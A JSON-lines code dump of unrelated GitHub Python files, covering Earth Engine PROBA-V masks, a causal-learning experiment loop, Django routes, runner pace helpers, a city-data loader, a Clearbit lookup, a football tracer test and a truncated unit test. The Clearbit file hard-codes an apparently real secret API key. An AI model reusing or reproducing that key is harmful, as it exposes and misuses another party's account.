: 0: Sea 1: Land (pixels with this value may include areas of sea)\n Bit 4: Radiometric quality SWIR flag : 0: Bad 1: Good\n Bit 5: Radiometric quality NIR flag : 0: Bad 1: Good\n Bit 6: Radiometric quality RED flag : 0: Bad 1: Good\n Bit 7: Radiometric quality BLUE flag : 0: Bad 1: Good\n \n remark: this is a BIT coded mask. \n we do use CategoricalProjectable (mode),\n but one might argue reprojecting should be done per-bit \n \n \"\"\"\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n \"\"\"\n \"\"\"\n #\n # base collection\n #\n eeimagecollection = (ee.ImageCollection('VITO/PROBAV/C1/S1_TOC_333M')\n .select(['SM'])\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) filtering\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # no sense in mosaicing: S1_TOC_333M is global\n # however: geeutils.mosaictodate adds the 'gee_date' property which is mandatory in a GEECol\n # TODO: check if nop-mosaic costs performance. if so add 'gee_date' without mosaicing\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=None, verbose=verbose) # currently None defaults to \"mosaic\" \n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'PV333sm')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(2, False) # mask to 00000010 - all bad, sea, undefined\n .toUint8()))\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_pv333simplemask(GEECol_pv333sm):\n \"\"\"\n https://developers.google.com/earth-engine/datasets/catalog/VITO_PROBAV_C1_S1_TOC_333M#bands\n \n STATUS MASK band:\n Bits 0-2: Cloud/ice snow/shadow flag : 0: Clear 1: Shadow 2: Undefined 3: Cloud4: Ice\n Bit 3: Land/sea : 0: Sea 1: Land (pixels with this value may include areas of sea)\n Bit 4: Radiometric quality SWIR flag : 0: Bad 1: Good\n Bit 5: Radiometric quality NIR flag : 0: Bad 1: Good\n Bit 6: Radiometric quality RED flag : 0: Bad 1: Good\n Bit 7: Radiometric quality BLUE flag : 0: Bad 1: Good\n\n geemask.SimpleMask: not masked (or clear) will be\n 0111 0000 : 112 Radiometric all but blue ok. sea. clear sky.\n 0111 1000 : 120 Radiometric all but blue ok. land. clear sky.\n 1111 0000 : 240 Radiometric all ok. sea. clear sky. \n 1111 1000 : 248 Radiometric all ok. land. clear sky. \n \n \"\"\"\n\n def __init__(self, colfilter=None):\n super().__init__(colfilter)\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n #\n # base collection from parent (SM)\n #\n eeimagecollection = super().collect(eeroi, eedatefrom, eedatetill, verbose=verbose)\n #\n #\n #\n def simplemask(image):\n return (geemask.SimpleMask([112, 120, 240, 248])\n .makemask(image)\n .Not()\n .unmask(255, False) # sameFootprint=False: otherwise missing beyond footprint becomes 0. TODO: what does this mean here (global images)\n .toUint8() # uint8 [0:not masked, 1:masked], no data: 255\n .rename('MASK')\n .copyProperties(image, ['system:time_start', 'gee_date']))\n eeimagecollection = eeimagecollection.map(simplemask)\n #\n # no mosaic/composite - already done in base collection - and was obsolete there, but for the 'gee_date' property\n #\n pass\n #\n # add collection properties describing this collection (in this case: overwrites 'gee_description' from GEECol_pv333sm)\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'PV333smsimplemask')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n 0: not masked\n 1: masked\n 255: no data\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .unmask(255, False) # no data to 255\n .toUint8())) # actually obsolete here\n return eeimagecollection\n\n\n\"\"\"\n\"\"\"\nclass GEECol_pv333rgb(GEECol, OrdinalProjectable):\n \"\"\"\n experimental - just for the fun of it (to check where multiband images give problems)\n - actually not rgb but a 'false color'\n \n https://developers.google.com/earth-engine/datasets/catalog/VITO_PROBAV_C1_S1_TOC_333M\n - doesn't bother to give minimum and maximum values of the bands\n \n https://proba-v.vgt.vito.be/sites/proba-v.vgt.vito.be/files/products_user_manual.pdf\n - reflectances: scale: 2000 offset: 0 no-data: -1\n - PV = (DN - OFFSET) / SCALE\n \n \"\"\"\n\n def __init__(self, colfilter=None):\n self.colfilter=colfilter\n if (colfilter is not None) and (not isinstance(colfilter, geemask.IColFilter) ) : raise ValueError(\"filter expected to be an IColFilter\")\n\n def collect(self, eeroi, eedatefrom, eedatetill, verbose=False):\n\n #\n #\n # \n eeimagecollection = (ee.ImageCollection('VITO/PROBAV/C1/S1_TOC_333M')\n .select(['RED', 'NIR', 'BLUE', 'SM']) # SM to allow STATUS MASK-based filters\n .filterBounds(eeroi)\n .filter(ee.Filter.date(eedatefrom, eedatetill)))\n #\n # (optional) filtering - typically -but not mandatory- using an SCL based filter\n #\n if self.colfilter is not None:\n eeimagecollection = self.colfilter.filtercollection(eeimagecollection, eeroi, verbose=verbose)\n #\n # drop SM band which was only included to allow STATUS MASK based filter\n #\n eeimagecollection = eeimagecollection.select(['RED', 'NIR', 'BLUE'])\n #\n # no sense in mosaicing: S1_TOC_333M is global\n # however: geeutils.mosaictodate adds the 'gee_date' property which is mandatory in a GEECol\n # TODO: check if nop-mosaic costs performance. if so add 'gee_date' without mosaicing\n #\n eeimagecollection = geeutils.mosaictodate(eeimagecollection, szmethod=None, verbose=verbose)\n #\n # add collection properties describing this collection\n # \n eeimagecollection = eeimagecollection.set('gee_description', 'PV333rgb')\n #\n #\n #\n return eeimagecollection\n\n def scaleandflag(self, eeimagecollection, verbose=False):\n \"\"\"\n PV products_user_manual:\n - reflectances: scale: 2000 offset: 0 no-data: -1\n - PV = (DN - OFFSET) / SCALE\n\n we'll try to mimic Sentinel-2 TCI bands scaling\n 'The TCI is an RGB image built from the B02 (Blue), B03 (Green), and B04 (Red) Bands. \n The reflectances are coded between 1 and 255, 0 being reserved for 'No Data'. \n\n \"\"\"\n eeimagecollection = eeimagecollection.map(lambda image: (image\n .divide(2000).multiply(254).add(1)\n .unmask(0, False)\n .toUint8()\n .copyProperties(image)\n .copyProperties(image, ['system:time_start'])))\n return eeimagecollection\n\n\n\n","repo_name":"haesend/geepatches","sub_path":"src/geepatches/geeproduct.py","file_name":"geeproduct.py","file_ext":"py","file_size_in_byte":92108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5893605277","text":"# -*- coding: utf-8 -*-\nimport nauka\nimport io, logging, os, sys, time, pdb\nimport torch\nimport uuid\n\nfrom PIL import Image\nfrom zipfile import ZipFile\n\nfrom .models import *\n\n\nclass ExperimentBase(nauka.exp.Experiment):\n \"\"\"\n The base class for all experiments.\n\n NOTE: This class inherits from nauka.exp.Experiment. \n An experiment comprises both an in-memory state and an on-disk state. At\n\tregular intervals, the in-memory state is synchronized with the on-disk\n\tstate, thus permitting a resume should the experiment be killed. These\n\ton-disk serializations are called \"snapshots\".\n\n some of the methods are:\n load(self, path): Load state of the experiment from given path.\n dump(self, path): Dump state to the directory path\n fromScratch(self): Start an experiment from a snapshot\n snapshot(self) : Take a snapshot of the experiment (uses dump(self, path) )\n purge(self, ...): Purge snapshot directory of all the snapshots preserving\n only some of those (e.g. the last one)\n\n\n \"\"\"\n def __init__(self, a):\n self.a = type(a)(**a.__dict__)\n self.a.__dict__.pop(\"__argp__\", None)\n self.a.__dict__.pop(\"__argv__\", None)\n self.a.__dict__.pop(\"__cls__\", None)\n if self.a.workDir:\n super().__init__(self.a.workDir)\n else:\n projName = \"CausalOptimization-40037046-a359-470b-b327-af9bbef3e532\"\n expNames = [] if self.a.name is None else self.a.name\n workDir = nauka.fhs.createWorkDir(self.a.baseDir, projName, self.uuid, expNames)\n super().__init__(workDir)\n self.mkdirp(self.logDir)\n \n def reseed(self, password=None):\n \"\"\"\n Reseed PRNGs for reproducibility at beginning of interval.\n \"\"\"\n password = password or \"Seed: {} Interval: {:d}\".format(self.a.seed,\n self.S.intervalNum,)\n nauka.utils.random.setstate (password)\n nauka.utils.numpy.random.set_state (password)\n nauka.utils.torch.random.manual_seed (password)\n nauka.utils.torch.cuda.manual_seed_all(password)\n return self\n \n def brk(self, it, max=None):\n \"\"\" Iterate through an iterator. Ends in case of debug or max reached\n \"\"\"\n for i, x in enumerate(it):\n if self.a.fastdebug and i>=self.a.fastdebug: break\n if max is not None and i>=max: break\n yield x\n \n @property\n def uuid(self):\n u = nauka.utils.pbkdf2int(128, self.name)\n u = uuid.UUID(int=u)\n return str(u)\n @property\n def dataDir(self):\n return self.a.dataDir\n @property\n def logDir(self):\n return os.path.join(self.workDir, \"logs\")\n @property\n def isDone(self):\n return (self.S.epochNum >= self.a.num_epochs or\n (self.a.fastdebug and self.S.epochNum >= self.a.fastdebug))\n @property\n def exitcode(self):\n return 0 if self.isDone else 1\n\n\n\nclass Experiment(ExperimentBase):\n \"\"\"\n Causal experiment.\n \"\"\"\n \n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n class MsgFormatter(logging.Formatter):\n def formatTime(self, record, datefmt):\n t = record.created\n timeFrac = abs(t-int(t))\n timeStruct = time.localtime(record.created)\n timeString = \"\"\n timeString += time.strftime(\"%F %T\", timeStruct)\n timeString += \"{:.3f} \".format(timeFrac)[1:]\n timeString += time.strftime(\"%Z\", timeStruct)\n return timeString\n formatter = MsgFormatter(\"[%(asctime)s ~~ %(levelname)-8s] %(message)s\")\n handlers = [\n logging.FileHandler (os.path.join(self.logDir, \"log.txt\")),\n logging.StreamHandler(sys.stdout),\n ]\n for h in handlers:\n h.setFormatter(formatter)\n logging.basicConfig(\n level = logging.INFO,\n handlers = handlers,\n )\n logging.info(\"*****************************************\")\n logging.info(\"Command: \"+\" \".join(sys.argv))\n logging.info(\"CWD: \"+os.getcwd())\n logging.info(\"Experiment Name: \"+self.name)\n logging.info(\"Experiment UUID: \"+self.uuid)\n logging.info(\"Experiment Work Dir: \"+self.workDir)\n logging.info(\"\")\n logging.info(\"\")\n \n @property\n def name(self):\n \"\"\"A unique name containing every attribute that distinguishes this\n experiment from another and no attribute that does not.\"\"\"\n attrs = [\n self.a.seed,\n self.a.model,\n self.a.num_epochs,\n self.a.batch_size, # | DEFAULT\n self.a.dpe, # (int) Nr of training distribution per epoch | 1000\n self.a.train_functional, # (int) Nr of batches for functional parameters per distribution | 0\n self.a.ipd, # (int) Nr of interventions per distribution | 100\n self.a.hidden_truth, # (int) Nr of hidden neurons in ground-truth network. | None\n self.a.hidden_learn, # (int) Nr of hidden neurons in learner network. | None\n self.a.num_vars, # (int) Nr of variables in the system (M in paper) | 5\n self.a.num_cats, # (int) Nr of categories per variable (N in paper) | 3\n self.a.num_parents, # (int) Nr of expected parents. Default is 5. | 5\n self.a.cpi, # (int) Nr Configurations per intervention | 20\n self.a.xfer_epi_size, # (int) Nr Transfer episode size | 10\n self.a.predict, # (int) Nr of iterations to predict which node was intervened upon| 0\n self.a.predict_cpb, # (int) Configurations per batch during intervention prediction | 10\n self.a.temperature, # (float) Temperature of the MLP. | 1.0\n self.a.structural_only, # (bool) whether to learn structural parameters only | False\n self.a.structural_init, # (bool) Initialize structural parameters to ground truth | False\n self.a.graph, # (str) structure of the causal graph (ground thruth) | None\n self.a.cuda, # | \n self.a.model_optimizer, # (str) Model Optimizer | nag:0.001,0.9 \n self.a.gamma_optimizer, # (str) Gamma optimizer | nag:0.0001,0.9\n self.a.lmaxent, # (float) Regularizer for maximum entropy | 0.00 \n self.a.lsparse, # (float) Regularizer for sparsity | 0.00\n self.a.ldag, # (float) Regularizer for DAGness | 0.1\n self.a.fastdebug, # (bool) Debug | False\n ]\n return \"-\".join([str(s) for s in attrs]).replace(\"/\", \"_\")\n \n def load(self, path):\n self.S = torch.load(os.path.join(path, \"snapshot.pkl\"))\n return self\n \n def dump(self, path):\n torch.save(self.S, os.path.join(path, \"snapshot.pkl\"))\n return self\n \n def fromScratch(self):\n pass\n \"\"\"Reseed PRNGs for initialization step\"\"\"\n self.reseed(password=\"Seed: {} Init\".format(self.a.seed))\n \n \"\"\"Create snapshottable-state object\"\"\"\n self.S = nauka.utils.PlainObject()\n \n \"\"\"Model Instantiation\"\"\"\n self.S.model = None\n if self.a.model == \"cat\":\n self.S.model = CategoricalWorld(self.a)\n elif self.a.model == \"asia\":\n self.S.model = AsiaWorld(self.a)\n if self.S.model is None:\n raise ValueError(\"Unsupported model \\\"\"+self.a.model+\"\\\"!\")\n \n if self.a.cuda:\n self.S.model = self.S.model.cuda(self.a.cuda[0])\n else:\n self.S.model = self.S.model.cpu()\n \n \"\"\"Optimizer Selection\"\"\"\n self.S.msoptimizer = nauka.utils.torch.optim.fromSpec(self.S.model.parameters_slow(), self.a.model_optimizer)\n self.S.goptimizer = nauka.utils.torch.optim.fromSpec(self.S.model.structural_parameters(), self.a.gamma_optimizer)\n \n \"\"\"Counters\"\"\"\n self.S.epochNum = 0\n self.S.intervalNum = 0\n self.S.stepNum = 0\n \n return self\n \n def run(self):\n \"\"\"Run by intervals until experiment completion.\"\"\"\n while not self.isDone:\n self.interval().snapshot().purge()\n return self\n \n def interval(self):\n \"\"\"\n An interval is defined as the computation- and time-span between two\n snapshots.\n \n Hard requirements:\n - By definition, one may not invoke snapshot() within an interval.\n - Corollary: The work done by an interval is either fully recorded or\n not recorded at all.\n - There must be a step of the event logger between any TensorBoard\n summary log and the end of the interval.\n \n For reproducibility purposes, all PRNGs are reseeded at the beginning\n of every interval.\n \"\"\"\n \n self.reseed()\n \n \n \"\"\"Training Loop\"\"\"\n self.S.model.train()\n for q in self.brk(range(self.a.dpe)): # For each training distribution in epoch\n if q>0: self.S.stepNum += 1\n \n # ==================================================================\n # 0) Initialize a new ground truth model with the same causal graph\n # ==================================================================\n self.S.model.alterdists() # reinitialize randomly the weights of the ground truth model\n # (but keep the struct of the causal graph ( gammagt ) unchanged)\n self.S.model.zero_fastparams() # Set to zero the fast parameters of the learner\n \n \n # ==================================================================\n # 1) Train slow parameters only Loop (to adapt to new ground truth model)\n # ==================================================================\n if self.a.train_functional:\n smpiter = self.S.model.sampleiter(self.a.batch_size) # An iterator of batch_size samples from the ground truth model\n cfgiter = self.S.model.configpretrainiter() # An iterator of causal structures drawn from the learner parameters gamma\n\n # Train the functional parameters\n for b, (batch, config) in self.brk(enumerate(zip(smpiter, cfgiter)), max=self.a.train_functional):\n self.S.msoptimizer.zero_grad() # self.S.msoptimizer optimizes only the slow parameters of the learner net\n # NLL: negative log likelihood\n nll = -self.S.model.logprob(batch, config)[0].mean() # Compute the loss from the learner on the batch with that config (using fast + slow params)\n nll.backward() # Compute the gradients\n self.S.msoptimizer.step() # Train the slow parameters of the learner network\n if self.a.verbose and b % self.a.verbose == 0:\n logging.info(\"Train functional param only NLL: \"+str(nll.item()))\n \n # ==================================================================\n # 2) Interventions Loop\n # 2.1) An intervention is done\n # 2.2) Estimate the node upon which the intervention was made\n # 2.3) Compute the loss / gradients w.r.t the intervention node [TODO NON L'HO CAPITA DEL TUTTO]\n # 2.4) Adapt the fast parameters of the learner to the intervention\n # 2.5) Optimize gamma\n # ==================================================================\n for j in self.brk(range(self.a.ipd)):\n if j>0: self.S.stepNum += 1\n intervention_tstart = time.time()\n \n \"\"\"Perform intervention under guard.\"\"\"\n # Perform an intervention which modifies the ground truth model at the beginning fo the loop\n # and undo it at the end of the loop\n\n # ==============================================================\n # 2.1) An intervention is done\n # ==============================================================\n with self.S.model.intervene() as intervention: \n\n # ==========================================================\n # 2.2) Estimate the node upon which the intervention was made\n # ==========================================================\n \"\"\"Possibly attempt to predict the intervention node,\n instead of relying on knowledge of it.\"\"\"\n if self.a.predict:\n with torch.no_grad():\n accnll = 0\n smpiter = self.S.model.sampleiter(self.a.batch_size) # An iterator of batch_size samples from the ground truth model\n cfgiter = self.S.model.configpretrainiter() # An iterator of causal structures drawn from the learner parameters gamma\n\n # Use self.a.predict batches and select the node with the smallest NLL\n # as the one for which the intervention was made. \n\n # TODO [Simone M.]: It might be better to select the node where the difference\n # NLL_after_intervention - NLL_before_intervention is the biggest ?\n\n for batch in self.brk(smpiter, max=self.a.predict): # Average result on self.a.predict batches\n for config in self.brk(cfgiter, max=self.a.predict_cpb): # Average the result on self.a.predict_cpb causal structures drawn\n accnll += -self.S.model.logprob(batch, config)[0].mean(0)\n selnode = torch.argmax(accnll).item()\n logging.info(\"Predicted Intervention Node: {} Actual Intervention Node: {}\".format([selnode], list(iter(intervention))))\n intervention = selnode\n \n self.S.goptimizer.zero_grad()\n self.S.model.gamma.grad = torch.zeros_like(self.S.model.gamma)\n \n # ==========================================================\n # 2.3) Compute the loss / gradients [TODO NON L'HO CAPITA DEL TUTTO]\n # ========================================================== \n\n gammagrads = [] # List of T tensors of shape (M,M,) indexed by (i,j)\n logregrets = [] # List of T tensors of shape (M,) indexed by (i,)\n \n \"\"\"Transfer Episode Adaptation Loop\"\"\"\n smpiter = self.S.model.sampleiter(self.a.batch_size) # An iterator of batch_size samples from the ground truth model\n for batch in self.brk(smpiter, max=self.a.xfer_epi_size):\n gammagrad = 0\n logregret = 0\n \n \"\"\"Configurations Loop\"\"\"\n cfgiter = self.S.model.configiter() # An iterator of causal structures drawn from the learner parameters gamma\n for config in self.brk(cfgiter, max=self.a.cpi):# For each intervention, consider self.a.cpi configurations\n \"\"\"Accumulate Gamma Gradient\"\"\"\n if self.a.predict: # If the intervention node has been estimated\n # Compute the loss only for the intervention node [TODO NON NE SONO SICURO!]\n logpn, logpi = self.S.model.logprob(batch, config, block=intervention)\n else:\n # Compute the loss for all nodes\n logpn, logpi = self.S.model.logprob(batch, config)\n with torch.no_grad():\n\n # TODO: Why are gradients computed in this way?\n gammagrad += self.S.model.gamma.sigmoid() - config\n logregret += logpn.mean(0)\n logpi.sum(1).mean(0).backward() # Compute the gradients\n \n gammagrads.append(gammagrad)\n logregrets.append(logregret)\n \n\n # ==========================================================\n # 2.4) Adapt the fast parameters of the learner to the intervention\n # ==========================================================\n \"\"\"Update Fast Optimizer\"\"\"\n # Train the fast parameters of the learner with the model_optimizer\n # to adapt to the interventon\n for batch in self.brk(smpiter, max=self.a.xfer_epi_size):\n self.S.model.zero_fastparams()\n self.S.mfoptimizer = nauka.utils.torch.optim.fromSpec(\n self.S.model.parameters_fast(), self.a.model_optimizer)\n self.S.mfoptimizer.zero_grad()\n cfgiter = self.S.model.configiter()\n for config in self.brk(cfgiter, max=self.a.cpi):\n logprob = self.S.model.logprob(batch, config)[0].sum(1).mean()\n logprob.backward()\n self.S.mfoptimizer.step()\n all_logprobs = []\n for batch in self.brk(smpiter, max=self.a.xfer_epi_size):\n cfgiter = self.S.model.configiter()\n for config in self.brk(cfgiter, max=self.a.cpi):\n all_logprobs.append(self.S.model.logprob(batch, config)[0].mean())\n \n # ==========================================================\n # 2.5) Optimize gamma\n # ==========================================================\n \"\"\"Gamma Gradient Estimator\"\"\"\n with torch.no_grad():\n gammagrads = torch.stack(gammagrads)\n logregrets = torch.stack(logregrets)\n normregret = logregrets.softmax(0)\n\n # R is the meta-objective (loss) for the slow params [see paper]\n # dRdgamma are its gradients w.r.t. gamma\n dRdgamma = torch.einsum(\"kij,ki->ij\", gammagrads, normregret)\n self.S.model.gamma.grad.copy_(dRdgamma)\n all_logprobs = torch.stack(all_logprobs).mean()\n \n \"\"\"Gamma Regularizers\"\"\"\n siggamma = self.S.model.gamma.sigmoid()\n Lmaxent = ((siggamma)*(1-siggamma)).sum().mul(-self.a.lmaxent)\n Lsparse = siggamma.sum().mul(self.a.lsparse)\n Ldag = siggamma.mul(siggamma.t()).cosh().tril(-1).sum() \\\n .sub(self.S.model.M**2 - self.S.model.M) \\\n .mul(self.a.ldag)\n (Lmaxent + Lsparse + Ldag).backward()\n \n \"\"\"Perform Gamma Update with constraints\"\"\"\n self.S.goptimizer.step()\n self.S.model.reconstrain_gamma()\n \n \"\"\"Stop timer\"\"\"\n intervention_tend = time.time()\n \n \"\"\"Print the state of training occasionally\"\"\"\n if self.a.verbose:\n with torch.no_grad():\n # Compute Binary Cross-Entropy over gammas, ignoring diagonal\n siggamma = self.S.model.gamma.sigmoid()\n pospred = siggamma.clone()\n negpred = 1-siggamma.clone()\n posgt = self.S.model.gammagt\n neggt = 1-self.S.model.gammagt\n pospred.diagonal().fill_(1)\n negpred.diagonal().fill_(1)\n bce = -pospred.log2_().mul_(posgt) -negpred.log2_().mul_(neggt)\n bce = bce.sum()\n bce.div_(siggamma.numel() - siggamma.diagonal().numel())\n \n logging.info(\"\")\n logging.info(\"**************************\")\n logging.info(\"Gamma GT: \"+os.linesep+str(self.S.model.gammagt.detach()))\n logging.info(\"Gamma: \"+os.linesep+str(siggamma))\n logging.info(\"dRdGamma: \"+os.linesep+str(dRdgamma))\n logging.info(\"Gamma Grad: \"+os.linesep+str(self.S.model.gamma.grad.detach()))\n logging.info(\"Gamma CE: \"+str(bce.item()))\n logging.info(\"Intervention Time (s): \"+str(intervention_tend-intervention_tstart))\n logging.info(\"Exp. temp. Transfer logprob: \"+str(all_logprobs.item()))\n logging.info(\"\")\n \n if self.S.stepNum % self.a.verbose == 0:\n # Append a PNG to a Zip file to avoid too many files\n # on the filesystem\n GAMMABIO = io.BytesIO()\n GAMMAVIZ = self.S.model.vizualize_gamma().numpy()\n GAMMAIMG = Image.fromarray(GAMMAVIZ, \"RGB\")\n GAMMAIMG.save(GAMMABIO, \"png\")\n GAMMAPNG = \"gamma-{:07d}.png\".format(self.S.stepNum)\n GAMMAZIP = os.path.join(self.logDir, \"gamma.zip\")\n with ZipFile(GAMMAZIP, 'a') as GAMMAZIP:\n GAMMAZIP.writestr(GAMMAPNG, GAMMABIO.getvalue())\n \n \n \"\"\"Exit\"\"\"\n logging.info(\"Epoch {:d} done.\\n\".format(self.S.epochNum))\n self.S.epochNum += 1\n self.S.intervalNum += 1\n self.S.stepNum += 1\n return self\n","repo_name":"Simosound94/causality_experiments","sub_path":"causal_learning_unknown_interventions/causal/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":23775,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"22872575857","text":"from django.conf.urls import url\nfrom . import views\n#from jhtdb.views import Getcutout\n\nurlpatterns = [\n # ex: /jhtdb/\n url(r'^$', views.index, name='index'),\n #url(r'^geturl/$', views.geturl, name='geturl'),\n url(r'^getcutout/(?P.*)$', views.getcutout, name='getcutout'),\n #url(r'^getcutout/(?P.*)$', Getcutout.as_view()),\n url(r'^preview/(?P.*)$', views.preview, name='preview'),\n url(r'^getprogress/(?P.*)$', views.getprogress, name='getprogress'),\n url(r'^poll_for_download/$', views.poll_for_download, name='poll_for_download'),\n url(r'^tests/(?P.*)$', views.tests, name='tests'),\n]\n","repo_name":"idies/Turbulence","sub_path":"Cutout_Webservice/jhtdb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"27190932544","text":"from enum import Enum\nfrom plan.utils import (\n split,\n join,\n vma_to_speed,\n)\n\n\nclass Gender(Enum):\n MAN = 0\n WOMAN = 1\n\n\nclass Runner:\n def __init__(self, age, vma, gender=Gender.MAN, max_hr=None):\n self.age = age\n self.vma = vma\n self.gender = gender\n if max_hr is None:\n # Gellish & Coll. 2007\n max_hr = 191.5 - 0.007 * (age * age)\n self.max_hr = max_hr\n\n @property\n def hash(self):\n return join([self.age, self.vma, Gender.MAN and \"0\" or \"1\", self.max_hr], \"%\")\n\n @classmethod\n def from_hash(cls, hash):\n elmts = split(hash, \"%\")\n age, vma, gender, max_hr = elmts\n return cls(\n int(age), float(vma), \"0\" and Gender.MAN or Gender.WOMAN, float(max_hr)\n )\n\n def get_max_fc(self, intensity):\n intensity = intensity / 100\n if intensity <= 0.7:\n return self.max_hr * (intensity + 0.08)\n if intensity > 0.95:\n return intensity\n return self.max_hr * (intensity + 0.1)\n\n def get_speed(self, intensity):\n return vma_to_speed(self.vma, intensity)\n\n def get_avg_speed(self, min_intensity, max_intensity):\n speed_low = self.get_speed(min_intensity)\n speed_high = self.get_speed(max_intensity)\n return (speed_low + speed_high) / 2.0\n","repo_name":"tarekziade/vma","sub_path":"plan/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20579899616","text":"from api.models import *\nimport pandas as pd\nfrom django.conf import settings\ndata = pd.read_csv(settings.BASE_DIR / 'api/indiadata.csv')\ncityob = city.objects.filter(country__name = \"India\")\ndef load():\n print('working',len(cityob))\n count = 0\n for da in cityob:\n fdf = data[ (data[\"COUNTY\"].str.lower() == da.name.lower()) & (data[\"STATE\"].str.lower() == da.state.name.lower()) ]\n if len(fdf) > 0:\n bulkdata = [\n cityLocations(\n city_id = da.id,\n location = record['CITY'],\n pincode = record['POSTAL_CODE'],\n latitude = record['LATITUDE'],\n longitude = record['LONGITUDE'],\n communitiny = record['COMMUNITY'],\n )\n for record in fdf.to_dict('records')\n ]\n cityLocations.objects.bulk_create(bulkdata)\n count += 1\n print(F\"{count} of {len(cityob)} {da.name} is done\")","repo_name":"RitikSisodiy/ulisting","sub_path":"api/loaddata.py","file_name":"loaddata.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34894045976","text":"import aiohttp\nimport asyncio\n\n\nURL = 'https://company.clearbit.com/v2/companies/find?domain={}'\n\nasync def get_company_data(domain):\n headers ={'Authorization': 'Bearer sk_30240e2d1dfc1d73d26ab80390d1fd49' }\n url = URL.format(domain)\n async with aiohttp.ClientSession() as session:\n async with session.get(url, headers=headers) as response:\n response = await response.json()\n if 'error' in response:\n message = response['error']['message']\n return {'success': False, 'data': {'message': message}}\n return {'success': True, 'data': response}\n \n\n\n\n\n# loop = asyncio.get_event_loop()\n# loop.run_until_complete(get_company_data('google.com'))","repo_name":"EladKulman/company_in","sub_path":"back/api/services/clearbit.py","file_name":"clearbit.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37636788969","text":"import sys\nimport numpy as np\nfrom absl import logging\n\nlogging.set_verbosity(logging.INFO)\n\nfrom gfootball.env import create_environment\nfrom ..tools.tracer import MatchTracer\n\nenv = create_environment(\n env_name=\"11_vs_11_kaggle\",\n number_of_left_players_agent_controls=1,\n number_of_right_players_agent_controls=0,\n representation=\"raw\",\n render=True, # set to True will save large-size RGB frame.\n write_full_episode_dumps=True,\n logdir=\"./temp\",\n other_config_options={\"sorted_observations\": True},\n)\n\ntracer = MatchTracer()\n\n# now, only need to provide those two parameters.\ntracer.update_settings({\"n_left_control\": 1, \"n_right_control\": 0})\n\nprint(\"test_tracer\")\nobs = env.reset()\nsteps = 0\nprint(steps)\nwhile True:\n try:\n actions = env.action_space.sample()\n if isinstance(actions, int):\n actions = [actions]\n tracer.update(obs, actions)\n obs, rew, done, info = env.step(actions)\n steps += 1\n if steps % 100 == 0:\n print(steps, rew)\n if done:\n tracer.update(obs)\n tracer.save(\"temp/random_play.trace\")\n break\n except:\n tracer.save(\"temp/random_play.trace\")\n break\n","repo_name":"Shanghai-Digital-Brain-Laboratory/DB-Football","sub_path":"light_malib/envs/gr_football/debugger/test_tracer.py","file_name":"test_tracer.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"37"} +{"seq_id":"886286039","text":"import os\nimport tempfile\nimport unittest\nfrom logging import getLogger, DEBUG, Formatter, StreamHandler\n\nfrom atcodertools.common.judgetype import JudgeType, ErrorType\nfrom atcodertools.constprediction.constants_prediction import predict_constants, predict_modulo, \\\n predict_yes_no, YesNoPredictionFailedError, predict_judge_method, \\\n MultipleDecimalCandidatesError, predict_limit\nfrom tests.utils.gzip_controller import make_html_data_controller\n\nANSWER_FILE = os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n './resources/test_constpred/answer.txt')\n\nlogger = getLogger(__name__)\nlogger.setLevel(DEBUG)\nhandler = StreamHandler()\nformatter = Formatter(\"%(asctime)s %(levelname)s: %(message)s\")\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\ndef _to_str(x):\n if x is None:\n return \"\"\n return str(x)\n\n\nclass TestConstantsPrediction(unittest.TestCase):\n\n def setUp(self):\n self.temp_dir = tempfile.mkdtemp()\n self.html_data_controller = make_html_data_controller(\n tempfile.mkdtemp())\n self.test_dir = self.html_data_controller.create_dir()\n\n def tearDown(self):\n self.html_data_controller.remove_dir()\n\n def test_predict_constants(self):\n with open(ANSWER_FILE, 'r') as f:\n answers = f.read().split(\"\\n\")\n\n agc_html_paths = [path for path in sorted(\n os.listdir(self.test_dir)) if \"agc\" in path]\n for html_path, answer_line in zip(agc_html_paths, answers):\n logger.debug(\"Testing {}\".format(html_path))\n constants = predict_constants(self._load(html_path))\n output_line = \"{:40} [mod]{:10} [yes]{:10} [no]{:10}\".format(html_path.split(\".\")[0],\n _to_str(\n constants.mod),\n _to_str(\n constants.yes_str),\n _to_str(constants.no_str))\n self.assertEqual(answer_line.rstrip(), output_line.rstrip())\n\n def 